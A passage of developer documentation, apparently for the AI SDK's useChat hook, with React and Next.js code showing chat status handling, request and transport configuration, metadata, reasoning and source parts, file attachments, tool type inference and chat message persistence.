      api: '/api/chat',
    }),
  });
  const [input, setInput] = useState('');

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.parts.map((part, index) =>
            part.type === 'text' ? <span key={index}>{part.text}</span> : null,
          )}
        </div>
      ))}

      <form
        onSubmit={e => {
          e.preventDefault();
          if (input.trim()) {
            sendMessage({ text: input });
            setInput('');
          }
        }}
      >
        <input
          value={input}
          onChange={e => setInput(e.target.value)}
          disabled={status !== 'ready'}
          placeholder="Say something..."
        />
        <button type="submit" disabled={status !== 'ready'}>
          Submit
        </button>
      </form>
    </>
  );
}

import { convertToModelMessages, streamText, UIMessage } from 'ai';
__PROVIDER_IMPORT__;

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: __MODEL__,
    system: 'You are a helpful assistant.',
    messages: convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

In the Page component, the useChat hook will request to your AI provider endpoint whenever the user sends a message using sendMessage. The messages are then streamed back in real-time and displayed in the chat UI.

This enables a seamless chat experience where the user can see the AI response as soon as it is available, without having to wait for the entire response to be received.

Customized UI

useChat also provides ways to manage the chat message states via code, show status, and update messages without being triggered by user interactions.

Status

The useChat hook returns a status. It has the following possible values:

submitted: The message has been sent to the API and we're awaiting the start of the response stream.
streaming: The response is actively streaming in from the API, receiving chunks of data.
ready: The full response has been received and processed; a new user message can be submitted.
error: An error occurred during the API request, preventing successful completion.

You can use status for e.g. the following purposes:

To show a loading spinner while the chatbot is processing the user's message.
To show a "Stop" button to abort the current message.
To disable the submit button.

'use client';

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';

export default function Page() {
  const { messages, sendMessage, status, stop } = useChat({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),
  });
  const [input, setInput] = useState('');

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.parts.map((part, index) =>
            part.type === 'text' ? <span key={index}>{part.text}</span> : null,
          )}
        </div>
      ))}

      {(status === 'submitted' || status === 'streaming') && (
        <div>
          {status === 'submitted' && <Spinner />}
          <button type="button" onClick={() => stop()}>
            Stop
          </button>
        </div>
      )}

      <form
        onSubmit={e => {
          e.preventDefault();
          if (input.trim()) {
            sendMessage({ text: input });
            setInput('');
          }
        }}
      >
        <input
          value={input}
          onChange={e => setInput(e.target.value)}
          disabled={status !== 'ready'}
          placeholder="Say something..."
        />
        <button type="submit" disabled={status !== 'ready'}>
          Submit
        </button>
      </form>
    </>
  );
}

Error State

Similarly, the error state reflects the error object thrown during the fetch request. It can be used to display an error message, disable the submit button, or show a retry button:

'use client';

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';

export default function Chat() {
  const { messages, sendMessage, error, reload } = useChat({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),
  });
  const [input, setInput] = useState('');

  return (
    <div>
      {messages.map(m => (
        <div key={m.id}>
          {m.role}:{' '}
          {m.parts.map((part, index) =>
            part.type === 'text' ? <span key={index}>{part.text}</span> : null,
          )}
        </div>
      ))}

      {error && (
        <>
          <div>An error occurred.</div>
          <button type="button" onClick={() => reload()}>
            Retry
          </button>
        </>
      )}

      <form
        onSubmit={e => {
          e.preventDefault();
          if (input.trim()) {
            sendMessage({ text: input });
            setInput('');
          }
        }}
      >
        <input
          value={input}
          onChange={e => setInput(e.target.value)}
          disabled={error != null}
        />
      </form>
    </div>
  );
}

Please also see the error handling guide for more information.

Modify messages

Sometimes, you may want to directly modify some existing messages. For example, a delete button can be added to each message to allow users to remove them from the chat history.

The setMessages function can help you achieve these tasks:

const { messages, setMessages } = useChat()

const handleDelete = (id) => {
  setMessages(messages.filter(message => message.id !== id))
}

return <>
  {messages.map(message => (
    <div key={message.id}>
      {message.role === 'user' ? 'User: ' : 'AI: '}
      {message.parts.map((part, index) => (
        part.type === 'text' ? (
          <span key={index}>{part.text}</span>
        ) : null
      ))}
      <button onClick={() => handleDelete(message.id)}>Delete</button>
    </div>
  ))}
  ...

You can think of messages and setMessages as a pair of state and setState in React.

Cancellation and regeneration

It's also a common use case to abort the response message while it's still streaming back from the AI provider. You can do this by calling the stop function returned by the useChat hook.

const { stop, status } = useChat()

return <>
  <button onClick={stop} disabled={!(status === 'streaming' || status === 'submitted')}>Stop</button>
  ...

When the user clicks the "Stop" button, the fetch request will be aborted. This avoids consuming unnecessary resources and improves the UX of your chatbot application.

Similarly, you can also request the AI provider to reprocess the last message by calling the regenerate function returned by the useChat hook:

const { regenerate, status } = useChat();

return (
  <>
    <button
      onClick={regenerate}
      disabled={!(status === 'ready' || status === 'error')}
    >
      Regenerate
    </button>
    ...
  </>
);

When the user clicks the "Regenerate" button, the AI provider will regenerate the last message and replace the current one correspondingly.

Throttling UI Updates

This feature is currently only available for React.

By default, the useChat hook will trigger a render every time a new chunk is received. You can throttle the UI updates with the experimental_throttle option.

const { messages, ... } = useChat({
  // Throttle the messages and data updates to 50ms:
  experimental_throttle: 50
})

Event Callbacks

useChat provides optional event callbacks that you can use to handle different stages of the chatbot lifecycle:

onFinish: Called when the assistant response is completed. The event includes the response message, all messages, and flags for abort, disconnect, and errors.
onError: Called when an error occurs during the fetch request.
onData: Called whenever a data part is received.

These callbacks can be used to trigger additional actions, such as logging, analytics, or custom UI updates.

import { UIMessage } from 'ai';

const {
  /* ... */
} = useChat({
  onFinish: ({ message, messages, isAbort, isDisconnect, isError }) => {
    // use information to e.g. update other UI states
  },
  onError: error => {
    console.error('An error occurred:', error);
  },
  onData: data => {
    console.log('Received data part from server:', data);
  },
});

It's worth noting that you can abort the processing by throwing an error in the onData callback. This will trigger the onError callback and stop the message from being appended to the chat UI. This can be useful for handling unexpected responses from the AI provider.

Request Configuration

Custom headers, body, and credentials

By default, the useChat hook sends a HTTP POST request to the /api/chat endpoint with the message list as the request body. You can customize the request in two ways:

Hook-Level Configuration (Applied to all requests)

You can configure transport-level options that will be applied to all requests made by the hook:

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';

const { messages, sendMessage } = useChat({
  transport: new DefaultChatTransport({
    api: '/api/custom-chat',
    headers: {
      Authorization: 'your_token',
    },
    body: {
      user_id: '123',
    },
    credentials: 'same-origin',
  }),
});

Dynamic Hook-Level Configuration

You can also provide functions that return configuration values. This is useful for authentication tokens that need to be refreshed, or for configuration that depends on runtime conditions:

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';

const { messages, sendMessage } = useChat({
  transport: new DefaultChatTransport({
    api: '/api/custom-chat',
    headers: () => ({
      Authorization: `Bearer ${getAuthToken()}`,
      'X-User-ID': getCurrentUserId(),
    }),
    body: () => ({
      sessionId: getCurrentSessionId(),
      preferences: getUserPreferences(),
    }),
    credentials: () => 'include',
  }),
});

Request-Level Configuration (Recommended)

// Pass options as the second parameter to sendMessage
sendMessage(
  { text: input },
  {
    headers: {
      Authorization: 'Bearer token123',
      'X-Custom-Header': 'custom-value',
    },
    body: {
      temperature: 0.7,
      max_tokens: 100,
      user_id: '123',
    },
    metadata: {
      userId: 'user123',
      sessionId: 'session456',
    },
  },
);

The request-level options are merged with hook-level options, with request-level options taking precedence. On your server side, you can handle the request with this additional information.

Setting custom body fields per request

You can configure custom body fields on a per-request basis using the second parameter of the sendMessage function. This is useful if you want to pass in additional information to your backend that is not part of the message list.

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Chat() {
  const { messages, sendMessage } = useChat();
  const [input, setInput] = useState('');

  return (
    <div>
      {messages.map(m => (
        <div key={m.id}>
          {m.role}:{' '}
          {m.parts.map((part, index) =>
            part.type === 'text' ? <span key={index}>{part.text}</span> : null,
          )}
        </div>
      ))}

      <form
        onSubmit={event => {
          event.preventDefault();
          if (input.trim()) {
            sendMessage(
              { text: input },
              {
                body: {
                  customKey: 'customValue',
                },
              },
            );
            setInput('');
          }
        }}
      >
        <input value={input} onChange={e => setInput(e.target.value)} />
      </form>
    </div>
  );
}

You can retrieve these custom fields on your server side by destructuring the request body:

export async function POST(req: Request) {
  // Extract additional information ("customKey") from the body of the request:
  const { messages, customKey }: { messages: UIMessage[]; customKey: string } =
    await req.json();
  //...
}

Message Metadata

You can attach custom metadata to messages for tracking information like timestamps, model details, and token usage.

// Server: Send metadata about the message
return result.toUIMessageStreamResponse({
  messageMetadata: ({ part }) => {
    if (part.type === 'start') {
      return {
        createdAt: Date.now(),
        model: 'gpt-5.1',
      };
    }

    if (part.type === 'finish') {
      return {
        totalTokens: part.totalUsage.totalTokens,
      };
    }
  },
});

// Client: Access metadata via message.metadata
{
  messages.map(message => (
    <div key={message.id}>
      {message.role}:{' '}
      {message.metadata?.createdAt &&
        new Date(message.metadata.createdAt).toLocaleTimeString()}
      {/* Render message content */}
      {message.parts.map((part, index) =>
        part.type === 'text' ? <span key={index}>{part.text}</span> : null,
      )}
      {/* Show token count if available */}
      {message.metadata?.totalTokens && (
        <span>{message.metadata.totalTokens} tokens</span>
      )}
    </div>
  ));
}

For complete examples with type safety and advanced use cases, see the Message Metadata documentation.

Transport Configuration

You can configure custom transport behavior using the transport option to customize how messages are sent to your API:

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';

export default function Chat() {
  const { messages, sendMessage } = useChat({
    id: 'my-chat',
    transport: new DefaultChatTransport({
      prepareSendMessagesRequest: ({ id, messages }) => {
        return {
          body: {
            id,
            message: messages[messages.length - 1],
          },
        };
      },
    }),
  });

  // ... rest of your component
}

The corresponding API route receives the custom request format:

export async function POST(req: Request) {
  const { id, message } = await req.json();

  // Load existing messages and add the new one
  const messages = await loadMessages(id);
  messages.push(message);

  const result = streamText({
    model: __MODEL__,
    messages: convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

Advanced: Trigger-based routing

For more complex scenarios like message regeneration, you can use trigger-based routing:

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';

export default function Chat() {
  const { messages, sendMessage, regenerate } = useChat({
    id: 'my-chat',
    transport: new DefaultChatTransport({
      prepareSendMessagesRequest: ({ id, messages, trigger, messageId }) => {
        if (trigger === 'submit-user-message') {
          return {
            body: {
              trigger: 'submit-user-message',
              id,
              message: messages[messages.length - 1],
              messageId,
            },
          };
        } else if (trigger === 'regenerate-assistant-message') {
          return {
            body: {
              trigger: 'regenerate-assistant-message',
              id,
              messageId,
            },
          };
        }
        throw new Error(`Unsupported trigger: ${trigger}`);
      },
    }),
  });

  // ... rest of your component
}

The corresponding API route would handle different triggers:

export async function POST(req: Request) {
  const { trigger, id, message, messageId } = await req.json();

  const chat = await readChat(id);
  let messages = chat.messages;

  if (trigger === 'submit-user-message') {
    // Handle new user message
    messages = [...messages, message];
  } else if (trigger === 'regenerate-assistant-message') {
    // Handle message regeneration - remove messages after messageId
    const messageIndex = messages.findIndex(m => m.id === messageId);
    if (messageIndex !== -1) {
      messages = messages.slice(0, messageIndex);
    }
  }

  const result = streamText({
    model: __MODEL__,
    messages: convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

To learn more about building custom transports, refer to the Transport API documentation.

Controlling the response stream

With streamText, you can control how error messages and usage information are sent back to the client.

Error Messages

import { convertToModelMessages, streamText, UIMessage } from 'ai';
__PROVIDER_IMPORT__;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: __MODEL__,
    messages: convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse({
    onError: error => {
      if (error == null) {
        return 'unknown error';
      }

      if (typeof error === 'string') {
        return error;
      }

      if (error instanceof Error) {
        return error.message;
      }

      return JSON.stringify(error);
    },
  });
}

Usage Information

Track token consumption and resource usage with message metadata:

Define a custom metadata type with usage fields (optional, for type safety)
Attach usage data using messageMetadata in your response
Display usage metrics in your UI components

Usage data is attached as metadata to messages and becomes available once the model completes its response generation.

import { openai } from '@ai-sdk/openai';
import {
  convertToModelMessages,
  streamText,
  UIMessage,
  type LanguageModelUsage,
} from 'ai';
__PROVIDER_IMPORT__;

// Create a new metadata type (optional for type-safety)
type MyMetadata = {
  totalUsage: LanguageModelUsage;
};

// Create a new custom message type with your own metadata
export type MyUIMessage = UIMessage<MyMetadata>;

export async function POST(req: Request) {
  const { messages }: { messages: MyUIMessage[] } = await req.json();

  const result = streamText({
    model: __MODEL__,
    messages: convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse({
    originalMessages: messages,
    messageMetadata: ({ part }) => {
      // Send total usage when generation is finished
      if (part.type === 'finish') {
        return { totalUsage: part.totalUsage };
      }
    },
  });
}

Then, on the client, you can access the message-level metadata.

'use client';

import { useChat } from '@ai-sdk/react';
import type { MyUIMessage } from './api/chat/route';
import { DefaultChatTransport } from 'ai';

export default function Chat() {
  // Use custom message type defined on the server (optional for type-safety)
  const { messages } = useChat<MyUIMessage>({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),
  });

  return (
    <div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
      {messages.map(m => (
        <div key={m.id} className="whitespace-pre-wrap">
          {m.role === 'user' ? 'User: ' : 'AI: '}
          {m.parts.map(part => {
            if (part.type === 'text') {
              return part.text;
            }
          })}
          {/* Render usage via metadata */}
          {m.metadata?.totalUsage && (
            <div>Total usage: {m.metadata?.totalUsage.totalTokens} tokens</div>
          )}
        </div>
      ))}
    </div>
  );
}

You can also access your metadata from the onFinish callback of useChat:

'use client';

import { useChat } from '@ai-sdk/react';
import type { MyUIMessage } from './api/chat/route';
import { DefaultChatTransport } from 'ai';

export default function Chat() {
  // Use custom message type defined on the server (optional for type-safety)
  const { messages } = useChat<MyUIMessage>({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),
    onFinish: ({ message }) => {
      // Access message metadata via onFinish callback
      console.log(message.metadata?.totalUsage);
    },
  });
}

Text Streams

useChat can handle plain text streams by setting the streamProtocol option to text:

'use client';

import { useChat } from '@ai-sdk/react';
import { TextStreamChatTransport } from 'ai';

export default function Chat() {
  const { messages } = useChat({
    transport: new TextStreamChatTransport({
      api: '/api/chat',
    }),
  });

  return <>...</>;
}

This configuration also works with other backend servers that stream plain text. Check out the stream protocol guide for more information.

Reasoning

Some models such as as DeepSeek deepseek-r1 and Anthropic claude-3-7-sonnet-20250219 support reasoning tokens. These tokens are typically sent before the message content. You can forward them to the client with the sendReasoning option:

import { convertToModelMessages, streamText, UIMessage } from 'ai';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: 'deepseek/deepseek-r1',
    messages: convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse({
    sendReasoning: true,
  });
}

On the client side, you can access the reasoning parts of the message object.

Reasoning parts have a text property that contains the reasoning content.

messages.map(message => (
  <div key={message.id}>
    {message.role === 'user' ? 'User: ' : 'AI: '}
    {message.parts.map((part, index) => {
      // text parts:
      if (part.type === 'text') {
        return <div key={index}>{part.text}</div>;
      }

      // reasoning parts:
      if (part.type === 'reasoning') {
        return <pre key={index}>{part.text}</pre>;
      }
    })}
  </div>
));

Sources

Some providers such as Perplexity and Google Generative AI include sources in the response.

Currently sources are limited to web pages that ground the response. You can forward them to the client with the sendSources option:

import { convertToModelMessages, streamText, UIMessage } from 'ai';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: 'perplexity/sonar-pro',
    messages: convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse({
    sendSources: true,
  });
}

On the client side, you can access source parts of the message object. There are two types of sources: source-url for web pages and source-document for documents. Here is an example that renders both types of sources:

messages.map(message => (
  <div key={message.id}>
    {message.role === 'user' ? 'User: ' : 'AI: '}

    {/* Render URL sources */}
    {message.parts
      .filter(part => part.type === 'source-url')
      .map(part => (
        <span key={`source-${part.id}`}>
          [
          <a href={part.url} target="_blank">
            {part.title ?? new URL(part.url).hostname}
          </a>
          ]
        </span>
      ))}

    {/* Render document sources */}
    {message.parts
      .filter(part => part.type === 'source-document')
      .map(part => (
        <span key={`source-${part.id}`}>
          [<span>{part.title ?? `Document ${part.id}`}</span>]
        </span>
      ))}
  </div>
));

Image Generation

Some models such as Google gemini-2.5-flash-image-preview support image generation. When images are generated, they are exposed as files to the client. On the client side, you can access file parts of the message object and render them as images.

messages.map(message => (
  <div key={message.id}>
    {message.role === 'user' ? 'User: ' : 'AI: '}
    {message.parts.map((part, index) => {
      if (part.type === 'text') {
        return <div key={index}>{part.text}</div>;
      } else if (part.type === 'file' && part.mediaType.startsWith('image/')) {
        return <img key={index} src={part.url} alt="Generated image" />;
      }
    })}
  </div>
));

Attachments

The useChat hook supports sending file attachments along with a message as well as rendering them on the client. This can be useful for building applications that involve sending images, files, or other media content to the AI provider.

There are two ways to send files with a message: using a FileList object from file inputs or using an array of file objects.

FileList

'use client';

import { useChat } from '@ai-sdk/react';
import { useRef, useState } from 'react';

export default function Page() {
  const { messages, sendMessage, status } = useChat();

  const [input, setInput] = useState('');
  const [files, setFiles] = useState<FileList | undefined>(undefined);
  const fileInputRef = useRef<HTMLInputElement>(null);

  return (
    <div>
      <div>
        {messages.map(message => (
          <div key={message.id}>
            <div>{`${message.role}: `}</div>

            <div>
              {message.parts.map((part, index) => {
                if (part.type === 'text') {
                  return <span key={index}>{part.text}</span>;
                }

                if (
                  part.type === 'file' &&
                  part.mediaType?.startsWith('image/')
                ) {
                  return <img key={index} src={part.url} alt={part.filename} />;
                }

                return null;
              })}
            </div>
          </div>
        ))}
      </div>

      <form
        onSubmit={event => {
          event.preventDefault();
          if (input.trim()) {
            sendMessage({
              text: input,
              files,
            });
            setInput('');
            setFiles(undefined);

            if (fileInputRef.current) {
              fileInputRef.current.value = '';
            }
          }
        }}
      >
        <input
          type="file"
          onChange={event => {
            if (event.target.files) {
              setFiles(event.target.files);
            }
          }}
          multiple
          ref={fileInputRef}
        />
        <input
          value={input}
          placeholder="Send message..."
          onChange={e => setInput(e.target.value)}
          disabled={status !== 'ready'}
        />
      </form>
    </div>
  );
}

File Objects

You can also send files as objects along with a message. This can be useful for sending pre-uploaded files or data URLs.

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
import { FileUIPart } from 'ai';

export default function Page() {
  const { messages, sendMessage, status } = useChat();

  const [input, setInput] = useState('');
  const [files] = useState<FileUIPart[]>([
    {
      type: 'file',
      filename: 'earth.png',
      mediaType: 'image/png',
      url: 'https://example.com/earth.png',
    },
    {
      type: 'file',
      filename: 'moon.png',
      mediaType: 'image/png',
      url: 'data:image/png;base64,iVBORw0KGgo...',
    },
  ]);

  return (
    <div>
      <div>
        {messages.map(message => (
          <div key={message.id}>
            <div>{`${message.role}: `}</div>

            <div>
              {message.parts.map((part, index) => {
                if (part.type === 'text') {
                  return <span key={index}>{part.text}</span>;
                }

                if (
                  part.type === 'file' &&
                  part.mediaType?.startsWith('image/')
                ) {
                  return <img key={index} src={part.url} alt={part.filename} />;
                }

                return null;
              })}
            </div>
          </div>
        ))}
      </div>

      <form
        onSubmit={event => {
          event.preventDefault();
          if (input.trim()) {
            sendMessage({
              text: input,
              files,
            });
            setInput('');
          }
        }}
      >
        <input
          value={input}
          placeholder="Send message..."
          onChange={e => setInput(e.target.value)}
          disabled={status !== 'ready'}
        />
      </form>
    </div>
  );
}

Type Inference for Tools

When working with tools in TypeScript, AI SDK UI provides type inference helpers to ensure type safety for your tool inputs and outputs.

InferUITool

The InferUITool type helper infers the input and output types of a single tool for use in UI messages:

import { InferUITool } from 'ai';
import { z } from 'zod';

const weatherTool = {
  description: 'Get the current weather',
  inputSchema: z.object({
    location: z.string().describe('The city and state'),
  }),
  execute: async ({ location }) => {
    return `The weather in ${location} is sunny.`;
  },
};

// Infer the types from the tool
type WeatherUITool = InferUITool<typeof weatherTool>;
// This creates a type with:
// {
//   input: { location: string };
//   output: string;
// }

InferUITools

The InferUITools type helper infers the input and output types of a ToolSet:

import { InferUITools, ToolSet } from 'ai';
import { z } from 'zod';

const tools = {
  weather: {
    description: 'Get the current weather',
    inputSchema: z.object({
      location: z.string().describe('The city and state'),
    }),
    execute: async ({ location }) => {
      return `The weather in ${location} is sunny.`;
    },
  },
  calculator: {
    description: 'Perform basic arithmetic',
    inputSchema: z.object({
      operation: z.enum(['add', 'subtract', 'multiply', 'divide']),
      a: z.number(),
      b: z.number(),
    }),
    execute: async ({ operation, a, b }) => {
      switch (operation) {
        case 'add':
          return a + b;
        case 'subtract':
          return a - b;
        case 'multiply':
          return a * b;
        case 'divide':
          return a / b;
      }
    },
  },
} satisfies ToolSet;

// Infer the types from the tool set
type MyUITools = InferUITools<typeof tools>;
// This creates a type with:
// {
//   weather: { input: { location: string }; output: string };
//   calculator: { input: { operation: 'add' | 'subtract' | 'multiply' | 'divide'; a: number; b: number }; output: number };
// }

Using Inferred Types

You can use these inferred types to create a custom UIMessage type and pass it to various AI SDK UI functions:

import { InferUITools, UIMessage, UIDataTypes } from 'ai';

type MyUITools = InferUITools<typeof tools>;
type MyUIMessage = UIMessage<never, UIDataTypes, MyUITools>;

Pass the custom type to useChat or createUIMessageStream:

import { useChat } from '@ai-sdk/react';
import { createUIMessageStream } from 'ai';
import type { MyUIMessage } from './types';

// With useChat
const { messages } = useChat<MyUIMessage>();

// With createUIMessageStream
const stream = createUIMessageStream<MyUIMessage>(/* ... */);

This provides full type safety for tool inputs and outputs on the client and server.

title: Chatbot Message Persistence description: Learn how to store and load chat messages in a chatbot.

Chatbot Message Persistence

Being able to store and load chat messages is crucial for most AI chatbots. In this guide, we'll show how to implement message persistence with useChat and streamText.

Starting a new chat

When the user navigates to the chat page without providing a chat ID, we need to create a new chat and redirect to the chat page with the new chat ID.

import { redirect } from 'next/navigation';
import { createChat } from '@util/chat-store';

export default async function Page() {
  const id = await createChat(); // create a new chat
  redirect(`/chat/${id}`); // redirect to chat page, see below
}

import { generateId } from 'ai';
import { existsSync, mkdirSync } from 'fs';
import { writeFile } from 'fs/promises';
import path from 'path';

export async function createChat(): Promise<string> {
  const id = generateId(); // generate a unique chat ID
  await writeFile(getChatFile(id), '[]'); // create an empty chat file
  return id;
}

function getChatFile(id: string): string {
  const chatDir = path.join(process.cwd(), '.chats');
  if (!existsSync(chatDir)) mkdirSync(chatDir, { recursive: true });
  return path.join(chatDir, `${id}.json`);
}

Loading an existing chat

When the user navigates to the chat page with a chat ID, we need to load the chat messages from storage.

The loadChat function in our file-based chat store is implemented as follows:

import { UIMessage } from 'ai';
import { readFile } from 'fs/promises';

export async function loadChat(id: string): Promise<UIMessage[]> {
  return JSON.parse(await readFile(getChatFile(id), 'utf8'));
}

// ... rest of the file

Validating messages on the server

When processing messages on the server that contain tool calls, custom metadata, or data parts, you should validate them using validateUIMessages before sending them to the model.

Validation with tools

When your messages include tool calls, validate them against your tool definitions:

import {
  convertToModelMessages,
  streamText,
  UIMessage,
  validateUIMessages,
  tool,
} from 'ai';
import { z } from 'zod';
import { loadChat, saveChat } from '@util/chat-store';
import { openai } from '@ai-sdk/openai';
import { dataPartsSchema, metadataSchema } from '@util/schemas';

// Define your tools
const tools = {
  weather: tool({
    description: 'Get weather information',
    parameters: z.object({
      location: z.string(),
      units: z.enum(['celsius', 'fahrenheit']),
    }),
    execute: async ({ location, units }) => {
      /* tool implementation */
    },
  }),
  // other tools
};

export async function POST(req: Request) {
  const { message, id } = await req.json();

  // Load previous messages from database
  const previousMessages = await loadChat(id);

  // Append new message to previousMessages messages
  const messages = [...previousMessages, message];

  // Validate loaded messages against
  // tools, data parts schema, and metadata schema
  const validatedMessages = await validateUIMessages({
    messages,
    tools, // Ensures tool calls in messages match current schemas
    dataPartsSchema,
    metadataSchema,
  });

  const result = streamText({
    model: 'openai/gpt-5-mini',
    messages: convertToModelMessages(validatedMessages),
    tools,
  });

  return result.toUIMessageStreamResponse({
    originalMessages: messages,
    onFinish: ({ messages }) => {
      saveChat({ chatId: id, messages });
    },
  });
}

Handling validation errors

Handle validation errors gracefully when messages from the database don't match current schemas:

import {
  convertToModelMessages,
  streamText,
  validateUIMessages,
  TypeValidationError,
} from 'ai';
import { type MyUIMessage } from '@/types';

export async function POST(req: Request) {
  const { message, id } = await req.json();

  // Load and validate messages from database
  let validatedMessages: MyUIMessage[];

  try {
    const previousMessages = await loadMessagesFromDB(id);
    validatedMessages = await validateUIMessages({
      // append the new message to the previous messages:
      messages: [...previousMessages, message],
      tools,
      metadataSchema,
    });
  } catch (error) {
    if (error instanceof TypeValidationError) {
      // Log validation error for monitoring
      console.error('Database messages validation failed:', error);
      // Could implement message migration or filtering here
      // For now, start with empty history
      validatedMessages = [];
    } else {
      throw error;
    }
  }

  // Continue with validated messages...
}

Displaying the chat

Once messages are loaded from storage, you can display them in your chat UI. Here's how to set up the page component and the chat display:

import { loadChat } from '@util/chat-store';
import Chat from '@ui/chat';

export default async function Page(props: { params: Promise<{ id: string }> }) {
  const { id } = await props.params;
  const messages = await loadChat(id);
  return <Chat id={id} initialMessages={messages} />;
}

The chat component uses the useChat hook to manage the conversation:

'use client';

import { UIMessage, useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';

export default function Chat({
  id,
  initialMessages,
}: { id?: string | undefined; initialMessages?: UIMessage[] } = {}) {
  const [input, setInput] = useState('');
  const { sendMessage, messages } = useChat({
    id, // use the provided chat ID
    messages: initialMessages, // load initial messages
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),
  });

  const handleSubmit = (e: React.FormEvent) => {
    e.preventDefault();
    if (input.trim()) {
      sendMessage({ text: input });
      setInput('');
    }
  };

  // simplified rendering code, extend as needed:
  return (
    <div>
      {messages.map(m => (
        <div key={m.id}>
          {m.role === 'user' ? 'User: ' : 'AI: '}
          {m.parts
            .map(part => (part.type === 'text' ? part.text : ''))
            .join('')}
        </div>
      ))}

      <form onSubmit={handleSubmit}>
        <input
          value={input}
          onChange={e => setInput(e.target.value)}
          placeholder="Type a message..."
        />
        <button type="submit">Send</button>
      </form>
    </div>
  );
}

Storing messages

useChat sends the chat id and the messages to the backend.

When loading messages from storage that contain tools, metadata, or custom data parts, validate them using validateUIMessages before processing (see the validation section above).

Storing messages is done in the onFinish callback of the toUIMessageStreamResponse function. onFinish receives the complete messages including the new AI response as UIMessage[].

import { openai } from '@ai-sdk/openai';
import { saveChat } from '@util/chat-store';
import { convertToModelMessages, streamText, UIMessage } from 'ai';

export async function POST(req: Request) {
  const { messages, chatId }: { messages: UIMessage[]; chatId: string } =
    await req.json();

  const result = streamText({
    model: 'openai/gpt-5-mini',
    messages: convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse({
    originalMessages: messages,
    onFinish: ({ messages }) => {
      saveChat({ chatId, messages });
    },
  });
}

The actual storage of the messages is done in the saveChat function, which in our file-based chat store is implemented as follows:

import { UIMessage } from 'ai';
import { writeFile } from 'fs/promises';

export async function saveChat({
  chatId,
  messages,
}: {
  chatId: string;
  messages: UIMessage[];
}): Promise<void> {
  const content = JSON.stringify(messages, null, 2);
  await writeFile(getChatFile(chatId), content);
}

// ... rest of the file

Message IDs

In addition to a chat ID, each message has an ID. You can use this message ID to e.g. manipulate individual messages.

Client-side vs Server-side ID Generation

By default, message IDs are generated client-side:

User message IDs are generated by the useChat hook on the client
AI response message IDs are generated by streamText on the server

For applications without persistence, client-side ID generation works perfectly. However, for persistence, you need server-side generated IDs to ensure consistency across sessions and prevent ID conflicts when messages are stored and retrieved.

Setting Up Server-side ID Generation

When implementing persistence, you have two options for generating server-side IDs:

Using generateMessageId in toUIMessageStreamResponse
Setting IDs in your start message part with createUIMessageStream

Option 1: Using `generateMessageId` in `toUIMessageStreamResponse`

You can control the ID format by providing ID generators using createIdGenerator():

import { createIdGenerator, streamText } from 'ai';

export async function POST(req: Request) {
  // ...
  const result = streamText({
    // ...
  });

  return result.toUIMessageStreamResponse({
    originalMessages: messages,
    // Generate consistent server-side IDs for persistence:
    generateMessageId: createIdGenerator({
      prefix: 'msg',
      size: 16,
    }),
    onFinish: ({ messages }) => {
      saveChat({ chatId, messages });
    },
  });
}

Option 2: Setting IDs with `createUIMessageStream`

Alternatively, you can use createUIMessageStream to control the message ID by writing a start message part:

import {
  generateId,
  streamText,
  createUIMessageStream,
  createUIMessageStreamResponse,
} from 'ai';

export async function POST(req: Request) {
  const { messages, chatId } = await req.json();

  const stream = createUIMessageStream({
    execute: ({ writer }) => {
      // Write start message part with custom ID
      writer.write({
        type: 'start',
        messageId: generateId(), // Generate server-side ID for persistence
      });

      const result = streamText({
        model: 'openai/gpt-5-mini',
        messages: convertToModelMessages(messages),
      });

      writer.merge(result.toUIMessageStream({ sendStart: false })); // omit start message part
    },
    originalMessages: messages,
    onFinish: ({ responseMessage }) => {
      // save your chat here
    },
  });

  return createUIMessageStreamResponse({ stream });
}

import { createIdGenerator } from 'ai';
import { useChat } from '@ai-sdk/react';

const { ... } = useChat({
  generateId: createIdGenerator({
    prefix: 'msgc',
    size: 16,
  }),
  // ...
});

Sending only the last message

To achieve this, you can provide a prepareSendMessagesRequest function to the transport. This function receives the messages and the chat ID, and returns the request body to be sent to the server.

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';

const {
  // ...
} = useChat({
  // ...
  transport: new DefaultChatTransport({
    api: '/api/chat',
    // only send the last message to the server:
    prepareSendMessagesRequest({ messages, id }) {
      return { body: { message: messages[messages.length - 1], id } };
    },
  }),
});

On the server, you can then load the previous messages and append the new message to the previous messages. If your messages contain tools, metadata, or custom data parts, you should validate them:

